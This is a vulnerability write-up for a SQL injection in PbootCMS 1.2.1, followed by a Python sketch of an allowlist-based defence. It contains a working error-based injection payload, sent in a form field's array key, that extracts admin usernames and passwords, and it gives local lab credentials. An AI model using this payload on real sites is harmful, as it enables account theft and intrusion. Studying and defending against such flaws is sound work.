The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
The MySQL database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql
An authorization code is required after installation. We can go to this URL and enter our IP to get the authorization code.
URL: https://www.pbootcms.com/freeasn.html
This SQL injection requires background api functionality.
http://127.0.0.1/Pbootcms-master/admin.php
username=admin
password=123456
When the api function is enabled in the background, the foreground api will have SQL injection.
http://127.0.0.1/PbootCMS-V1.2.1/api.php/cms/addform?fcode=1
POST:contacts[content`) VALUES ( updatexml(1,concat(0x7e,(SELECT//distinct//concat(0x23,username,0x3a,password,0x23)//FROM//ay_user//limit//0,1),0x7e),1) );-- a] = 111 & mobile=13112344321 & content=123
We can get the admin account name and password
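
The request above carries SQL syntax in the array key of `contacts[...]`, which suggests that the submitted field name, not its value, reaches the column list of the INSERT. The following is an added example, not PbootCMS code: a Python sketch (the CMS itself is PHP) of a form handler that allowlists submitted field names and binds the values. The table name, column names and sample requests are constructed assumptions.

```python
import re
import sqlite3

# Assumption: the columns a public form may write (hypothetical names).
ALLOWED_COLUMNS = frozenset({"contacts", "mobile", "content"})
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


class RejectedField(ValueError):
    """A submitted field name is not a permitted column."""


def flatten(form):
    """Collect (name, value) pairs; keys of array parameters count as names."""
    pairs = []
    for name, value in form.items():
        if isinstance(value, dict):
            pairs.extend(flatten(value))
        else:
            pairs.append((name, value))
    return pairs


def build_insert(table, form):
    """Return (sql, params). `table` is chosen by the application, never the client."""
    pairs = flatten(form)
    if not pairs:
        raise RejectedField("no fields submitted")
    for name, _ in pairs:
        # Names are checked against the allowlist; they are never escaped and reused.
        if not IDENTIFIER.fullmatch(name) or name not in ALLOWED_COLUMNS:
            raise RejectedField(repr(name))
    cols = [name for name, _ in pairs]
    if len(set(cols)) != len(cols):
        raise RejectedField("duplicate column")
    col_sql = ", ".join(f'"{c}"' for c in cols)
    marks = ", ".join("?" for _ in cols)
    return f'INSERT INTO "{table}" ({col_sql}) VALUES ({marks})', [v for _, v in pairs]


def demo():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE message (contacts TEXT, mobile TEXT, content TEXT)")
    good = {"contacts": "alice", "mobile": "13112344321", "content": "hello"}
    db.execute(*build_insert("message", good))
    # Constructed request: the array key carries SQL syntax instead of a name.
    bad = {"contacts": {"content`) VALUES (1);-- a": "111"}, "mobile": "1"}
    try:
        build_insert("message", bad)
        rejected = False
    except RejectedField:
        rejected = True
    rows = db.execute("SELECT contacts, mobile, content FROM message").fetchall()
    return rows, rejected
```

Rejecting the whole request on an unknown name, instead of dropping or escaping it, also leaves a clear signal for logging when someone probes the endpoint with crafted keys.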